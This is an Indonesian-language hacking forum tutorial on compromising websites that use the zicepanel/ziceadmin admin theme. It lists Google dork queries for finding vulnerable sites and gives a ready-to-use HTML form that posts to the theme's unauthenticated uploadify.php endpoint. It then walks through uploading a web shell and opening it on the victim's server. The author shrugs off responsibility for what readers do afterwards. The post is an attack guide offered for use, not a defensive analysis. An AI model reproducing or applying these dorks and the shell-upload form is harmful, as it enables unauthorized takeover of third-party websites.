xixihi, kali ini Nuenomaru akan menjelaskan sesuai Judul thread hari ini.
langsung aja step step ninja nya:
Exploit : zicepanel/ziceadmin uploadify
Dork:
inurl:/themes/ziceadmin
inurl:/themes/zicepanel
Baca artikel ini juga gan, bagi pengguna Pinguin Kecil >3<"
Dorking pada BinGoo di Linux
SourceCode CSRF:
<form
action="http://target.co.li/themes/zicepanel/components/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
Save SourceCode html itu menjadi contoh.html
http://target.co.li/themes/[path]/ <~ ganti dengan url web target anda dan susaikan juga tema yang web korban sedang gunakan.
- Cari web vuln dengan salah satu Dork diatas
- Masukan alamat web target sobat ke handuk.
- seperti gambar dibawah ini
* browse cari dan pilih shell yang akan sobat Upload
* Gula :'v
LALU JIKA SUDAH KLIK UPLOAD
Done o.O?? jika sukses terupload shell sobat.
maka akan muncul nama shell random yang sobat miliki :p
Lalu copy shell random , kek digambar.
taruh/pastekan seterah url target.
contoh:
Shell Akses: www.target.com/[randomshellagan].php
Jika dah sukses kek gambar diatas.
seterah mau sobat apain, pokoknya bukan tanggungan Nue ya >.<"
menurut nue sih , hargai karya dan kerja keras webmasternya .
titip file ~> patch ^_^ ituu lebihh bagus :D
Sekian tutorial kali ini
Semoga bermanfaat dan maaf bila ada kesalahan.
./Nuenomaru
EmoticonEmoticon